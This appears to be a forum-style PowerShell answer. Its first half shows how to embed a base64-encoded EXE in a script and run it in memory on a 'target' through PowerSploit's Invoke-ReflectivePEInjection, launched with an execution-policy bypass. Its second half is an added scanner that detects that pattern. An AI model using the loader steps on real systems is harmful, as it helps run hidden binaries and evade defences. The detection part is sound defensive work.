1. Base64-encode the binary file
You can use the following function:
function Convert-BinaryToString {
    [CmdletBinding()]
    param (
        [string] $FilePath
    )
    # Read the whole file into memory as a byte array.
    try {
        $ByteArray = [System.IO.File]::ReadAllBytes($FilePath);
    }
    catch {
        throw "Failed to read file. Ensure that you have permission to the file, and that the file path is correct.";
    }
    # Encode the bytes as one base64 string; an empty file fails the check below.
    if ($ByteArray) {
        $Base64String = [System.Convert]::ToBase64String($ByteArray);
    }
    else {
        throw '$ByteArray is $null.';
    }
    Write-Output -InputObject $Base64String;
}
2. Create a new script following this process
1. Use the method from the previous step to convert the EXE file to a string;
2. Copy Invoke-ReflectivePEInjection (part of the Powersploit project);
3. Convert the string back to a byte array;
4. Call Invoke-ReflectivePEInjection.
So the binary file is just a string inside the Powershell script; after decoding the string to a byte array, you can call Invoke-ReflectivePEInjection to run it directly in memory.
In the end it looks like this:
# base64-encoded binary file
$InputString = '...........'
function Invoke-ReflectivePEInjection
{
    ......
    ......
    ......
}
# Convert the base64 string back to a byte array
$PEBytes = [System.Convert]::FromBase64String($InputString)
# Run the EXE in memory
Invoke-ReflectivePEInjection -PEBytes $PEBytes -ExeArgs "Arg1 Arg2 Arg3 Arg4"
Now you can run the script on the target:
powershell -ExecutionPolicy Bypass -File payload.ps1
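The final script above has a recognisable shape: a very long base64 literal, a call to FromBase64String, and the decoded bytes handed to Invoke-ReflectivePEInjection. The following scanner, added here as an example and not part of the original answer or of PowerSploit, flags script text that carries those markers. The function name Find-EmbeddedPEIndicators, the 200-character length threshold, the "two indicators is suspicious" rule and the sample scripts are all assumptions made for the example; the "TVqQ" check rests on the fact that the PE header bytes "MZ\x90\x00" base64-encode to "TVqQAA".

```powershell
# Added example, not part of the original answer: scan PowerShell source text
# for the structure described above (long base64 literal -> FromBase64String ->
# Invoke-ReflectivePEInjection). Thresholds and names here are assumptions.
function Find-EmbeddedPEIndicators {
    [CmdletBinding()]
    param (
        [Parameter(Mandatory)]
        [string] $ScriptText
    )

    $indicators = New-Object System.Collections.Generic.List[string]

    # A quoted base64 literal of 200+ characters assigned to a variable.
    # The length threshold is an assumption; tune it for your environment.
    if ($ScriptText -match '=\s*[''"][A-Za-z0-9+/]{200,}={0,2}[''"]') {
        $indicators.Add('long-base64-literal')
    }

    # "MZ\x90\x00" (the DOS header that starts every PE file) base64-encodes
    # to "TVqQAA", so a quoted literal beginning with TVqQ is an embedded PE.
    if ($ScriptText -match '[''"]TVqQ') {
        $indicators.Add('base64-PE-header')
    }

    # The literal is decoded back into bytes.
    if ($ScriptText -match '(?i)\[(System\.)?Convert\]::FromBase64String') {
        $indicators.Add('FromBase64String')
    }

    # The bytes are handed to the reflective loader named in the answer.
    if ($ScriptText -match '(?i)Invoke-ReflectivePEInjection') {
        $indicators.Add('Invoke-ReflectivePEInjection')
    }

    [pscustomobject]@{
        Indicators = $indicators.ToArray()
        # Two or more independent indicators is treated as suspicious (assumption).
        Suspicious = ($indicators.Count -ge 2)
    }
}

# Constructed sample in the shape of the answer's final script. The base64
# string is junk (a PE header prefix followed by padding), not a real binary.
$sampleScript = @(
    "`$InputString = 'TVqQ" + ('A' * 300) + "'"
    '$PEBytes = [System.Convert]::FromBase64String($InputString)'
    'Invoke-ReflectivePEInjection -PEBytes $PEBytes -ExeArgs "Arg1 Arg2"'
) -join "`n"

# A benign administrative script for comparison (also constructed).
$benignScript = 'Get-ChildItem -Path C:\Windows -Filter *.log | Out-File list.txt'

Find-EmbeddedPEIndicators -ScriptText $sampleScript
Find-EmbeddedPEIndicators -ScriptText $benignScript
```

To check a file on disk, pass `Get-Content -Path .\payload.ps1 -Raw` as the -ScriptText value. Note that -ExecutionPolicy Bypass only skips the policy check; when PowerShell script block logging is enabled, the text of the script still lands in the Microsoft-Windows-PowerShell/Operational log as event 4104, so the same scan can be run over logged script blocks rather than only over files.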